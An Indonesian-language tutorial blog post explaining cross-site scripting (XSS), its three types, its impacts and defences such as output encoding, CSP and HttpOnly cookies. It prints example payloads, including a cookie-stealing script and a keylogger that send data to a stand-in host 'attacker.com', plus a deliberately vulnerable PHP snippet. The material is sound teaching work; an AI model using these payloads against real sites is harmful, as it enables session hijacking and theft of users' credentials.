Teknik Hacking #07 | XSS (Cross Site Scripting), Celah Sederhana yang Bikin Website Tumbang

Ah, kembali lagi di Penting Literasi semuanya! Masih di seri Teknik Hacking, setelah kita kemarin pusing-pusing sama SQL Injection yang urusan sama database, sekarang kita bahas satu lagi yang gak kalah serem dan bahkan lebih sering muncul di daftar OWASP Top 10. Namanya Cross Site Scripting atau yang lebih dikenal dengan XSS. Tenang aja, jadwal saya udah balik lagi setiap Sabtu guys! Stay tune yah!

Oke, jadi ceritanya gini. Bayangin lo lagi asik-asik nge-browsing website kesayangan, trus tiba-tiba muncul pop-up aneh, atau malah lo diarahin ke situs judi online. Atau lebih serem lagi, tanpa lo sadar, data login lo dicuri. Nah, bisa jadi itu ulah dari XSS. Serangan ini tuh sederhana tapi dampaknya bisa luar biasa. Penasaran? Yuk kita bedah satu-satu.

A. Apa Itu XSS (Cross Site Scripting)?

Oke kita mulai dari namanya dulu. Cross Site Scripting itu adalah teknik serangan injeksi kode di mana attacker menyisipkan skrip jahat (biasanya JavaScript) ke dalam halaman web yang kemudian dijalankan oleh browser pengguna lain yang mengunjungi halaman tersebut ^[1].

Jadi gini, website yang vulnerable itu kayak gapura tanpa satpam. Attacker bisa nyelipin kode JavaScript seenaknya lewat kolom komentar, kotak pencarian, atau formulir lainnya. Ketika pengguna lain (korban) membuka halaman yang udah disusupi itu, browser korban dengan polosnya akan menjalankan kode JavaScript milik attacker ^[2]. Mirip kayak kita buka surat, tapi ternyata di dalamnya ada virus yang langsung aktif.

XSS ini beda sama serangan lain. Dia gak langsung nyerang server, tapi nyerang pengguna lain yang mengakses server. Makanya XSS ini termasuk client-side attack. Iya, serem kan?

B. Jenis-Jenis XSS: Tiga Saudara Kembar yang Berbahaya

Nah, dalam ilmu per-XSS-an, ada tiga jenis utama yang harus lo kenali. Masing-masing punya cara kerja yang berbeda ^[3].

1. Stored XSS (Persistent XSS)

Ini dia yang paling berbahaya. Disebut stored atau persistent karena skrip jahatnya disimpan permanen di server, misalnya di database ^[4].

Skenaronya gini:

• Attacker buka kolom komentar di sebuah blog.
• Dia nulis komentar biasa, tapi di dalamnya diselipin skrip jahat kayak gini:

<script>alert('XSS Berhasil!');</script>

• Komentar itu masuk ke database dan ditampilkan setiap kali halaman blog dibuka.
• Setiap pengunjung yang baca komentar, otomatis skripnya kejalanin ^[5].
• Bayangin kalau skripnya bukan cuma alert doang, tapi kode buat nyuri cookie session. Bisa gila dah.

Stored XSS ini paling ngeri karena menjangkau banyak korban tanpa perlu interaksi lebih dari attacker. Cukup nunggu korban datang, mereka langsung kena ^[6].

2. Reflected XSS (Non-Persistent XSS)

Nah kalau yang ini, skrip jahatnya tidak disimpan di server. Dia hanya "dipantulkan" (reflected) melalui server, biasanya lewat URL atau parameter pencarian ^[7].

Skenaronya:

• Attacker bikin link jahat kayak gini:

https://situsrentan.com/search?q=<script>alert('XSS')</script>

• Link ini dikirim ke korban lewat email, DM, atau medsos.
• Korban yang penasaran klik link tersebut.
• Server menerima parameter q yang berisi skrip, lalu langsung menampilkannya di halaman hasil pencarian.
• Browser korban dengan setia menjalankan skrip tersebut ^[8].

Serangan ini butuh "tipu daya" dari attacker supaya korban mau nge-klik link. Makanya sering dipaduin sama teknik social engineering atau phishing ^[9].

3. DOM-Based XSS

Ini yang paling canggih dan sering luput dari deteksi. DOM-Based XSS terjadi murni di sisi klien (browser), karena JavaScript yang ada di halaman web memproses input dari pengguna dengan tidak aman ^[10].

Skenaronya:

• Sebuah halaman web punya kode JavaScript yang membaca nilai dari URL (misalnya fragment identifier atau parameter) lalu menulisnya langsung ke halaman.
• Attacker bikin link dengan payload di bagian hash:

https://situsrentan.com/#<script>alert('DOM XSS')</script>

• Saat halaman dimuat, JavaScript akan membaca payload dari URL dan menyisipkannya ke DOM (Document Object Model) halaman.
• Karena gak ada validasi, skrip langsung dieksekusi ^[11].

Uniknya, serangan ini bahkan gak perlu server untuk merefleksikan payload. Semua terjadi di browser korban. Server bisa aja gak nyatet apa-apa di log-nya, karena di sisi server request-nya cuma ke situsrentan.com/ tanpa parameter aneh.

C. Dampak XSS: Dari Gangguan Kecil Sampai Kehancuran Total

Mungkin lo mikir, "Ah cuma bisa munculin alert doang, kecil banget". Eits, jangan salah! XSS itu jauh lebih berbahaya dari yang lo kira ^[12]. Berikut beberapa dampak yang bisa ditimbulkan:

1. Pencurian Cookie dan Session Hijacking

   Ini yang paling umum. Dengan XSS, attacker bisa ngejalanin kode kayak gini:

   <script>
   document.location='http://attacker.com/steal.php?cookie=' + document.cookie;
   </script>

   Kode ini akan mengirim cookie session korban ke server attacker. Dengan cookie itu, attacker bisa login seolah-olah dia adalah korban, tanpa perlu tahu username atau password ^[13].

2. Keylogging (Merekam Semua Ketikan Korban)

   Attacker bisa menyisipkan skrip yang merekam semua tombol yang ditekan korban di halaman web, termasuk password, nomor kartu kredit, atau pesan pribadi ^[14].

   <script>
   document.onkeypress = function(e) {
       fetch('http://attacker.com/log?key=' + e.key);
   }
   </script>

3. Phishing dan Defacement

   XSS bisa dipakai untuk mengubah tampilan website secara total (deface) atau menampilkan form login palsu di atas halaman asli. Korban yang gak curiga akan mengisi username dan password, dan langsung dikirim ke attacker ^[15].

4. Menyebarkan Malware

   Skrip XSS bisa mengarahkan browser korban ke situs yang mengandung exploit kit, yang kemudian otomatis mencoba menginstall malware ke perangkat korban ^[16].

5. Menjalankan Aksi Atas Nama Korban

   Dengan XSS, attacker bisa memerintahkan browser korban untuk melakukan aksi tertentu di website, seperti mengganti password, mengirim pesan, transfer uang, atau bahkan menghapus akun, tanpa sepengetahuan korban ^[17].

D. Kenapa Bisa Terjadi? (Akar Masalahnya)

Penyebab utama XSS sebenarnya sederhana: aplikasi web mempercayai input dari pengguna dan menampilkannya langsung tanpa dibersihkan dulu ^[18].

Contoh kode PHP vulnerable yang paling klasik:

<?php
$nama = $_GET['nama'];
echo "Halo, " . $nama . "!";
?>

Coba lo bayangin, kalau parameter nama diisi dengan <script>alert('XSS')</script>, maka kode yang dikirim ke browser jadi:

Halo, <script>alert('XSS')</script>!

Nah, tuh kan jalan.

E. Cara Mencegah dan Mitigasi XSS

Berita baiknya, XSS ini 100% bisa dicegah. Gak ada alasan buat website modern masih kena XSS kalau developernya paham dasar-dasar keamanan. Berikut jurus-jurus ampuhnya ^[19]:

1. Validasi Input (Input Validation)

Jangan percaya apapun dari user. Selalu validasi input apakah sesuai dengan yang diharapkan. Misalnya field umur harus angka, field email harus format email. Tapi ingat, validasi input aja gak cukup, karena kadang karakter berbahaya bisa aja lolos validasi. Makanya butuh lapisan berikutnya ^[20].

2. Encoding Output (Output Sanitization)

Ini jurus pamungkas. Semua data yang berasal dari user WAJIB di-encode sebelum ditampilkan ke halaman HTML. Gunakan fungsi yang tepat sesuai konteksnya ^[21]:

• Di PHP: htmlspecialchars($data, ENT_QUOTES, 'UTF-8') – fungsi ini akan mengubah karakter <, >, ", ', dan & menjadi entitas HTML (<, >, dll) sehingga browser gak bakal ngejalaninnya sebagai kode.
• Di Python (Django/Jinja2): Gunakan autoescaping yang udah default.
• Di JavaScript: Hindari penggunaan innerHTML dan gunakan textContent atau innerText untuk menampilkan teks. Kalau terpaksa harus nampilin HTML, pastikan pake library sanitasi kayak DOMPurify.

Jadi, kode vulnerable tadi kalau diperbaiki jadi:

<?php
$nama = $_GET['nama'];
echo "Halo, " . htmlspecialchars($nama, ENT_QUOTES, 'UTF-8') . "!";
?>

Kalau user input <script>alert('XSS')</script>, yang tampil di browser adalah teks polos Halo, <script>alert('XSS')</script>!, bukan skrip yang dijalanin.

3. Content Security Policy (CSP)

Ini adalah fitur keamanan modern yang dipasang di level server. CSP adalah header HTTP yang memberitahu browser sumber daya apa saja yang boleh dimuat dan dijalankan di halaman web ^[22].

Contoh kebijakan CSP yang ketat:

Content-Security-Policy: default-src 'self'; script-src 'self';

Artinya: browser cuma boleh menjalankan skrip yang berasal dari domain yang sama ('self'). Semua skrip inline (yang nempel di HTML) dan skrip dari domain lain akan diblokir. Ini sangat efektif mencegah XSS karena attacker gak bisa ngejalanin skrip mereka ^[23].

4. Hindari Penggunaan Fungsi Berbahaya

Di JavaScript, hindari penggunaan fungsi-fungsi yang bisa ngeksekusi kode secara dinamis kayak eval(), setTimeout() dengan string, setInterval() dengan string, atau Function() constructor. Juga hindari manipulasi DOM dengan innerHTML atau document.write() kalau masih ada data dari user. Gunakan alternatif yang lebih aman seperti textContent atau createElement ^[24].

5. HttpOnly Cookie

Untuk mengurangi dampak pencurian cookie, set cookie dengan flag HttpOnly. Cookie dengan flag ini gak bakal bisa diakses oleh JavaScript (document.cookie). Jadi meskipun ada XSS, attacker gak bisa nyuri cookie session-nya ^[25]. Setting di server side.

Contoh di PHP:

setcookie("sessionID", $session_value, [
    'httponly' => true,
    'secure' => true,
    'samesite' => 'Strict'
]);

F. Kesimpulan

XSS itu kayak silent killer di dunia web. Dia sederhana, sering disepelein, tapi dampaknya bisa bikin website lo kehilangan reputasi, data user dicuri, sampai disalahgunakan untuk nyebarin malware.

Inti pencegahannya cuma dua: jangan pernah percaya input user dan encode semua output. Tambahin juga dengan penerapan CSP dan HttpOnly cookie sebagai lapisan perlindungan tambahan.

Jadi, buat lo yang lagi belajar bikin website, jangan cuma fokus sama fitur dan tampilannya doang. Keamanan itu harga mati. Jangan sampai website lo yang keren jadi sarang XSS dan ngerugiin banyak orang.

Akhir kata: Sekian dulu guys untuk episode XSS ini. Semoga paham dan gak bingung. Ingat, kemampuan ini adalah pedang bermata dua. Gunakan untuk melindungi, bukan untuk merusak. Tetap semangat belajar karena LITERASI ITU PENTING!!

Dan Hei, Sekarang Penting Literasi Udah Ada Kotak Respon Loh...

Caranya klik menu navbar diatas, dan tekan respon. Kamu akan dialihkan dan silahkan buat apa yang ingin kamu sampaikan!

Terimakasih tetaplah semangat dalam mencari ilmu karena LITERASI ITU PENTING!!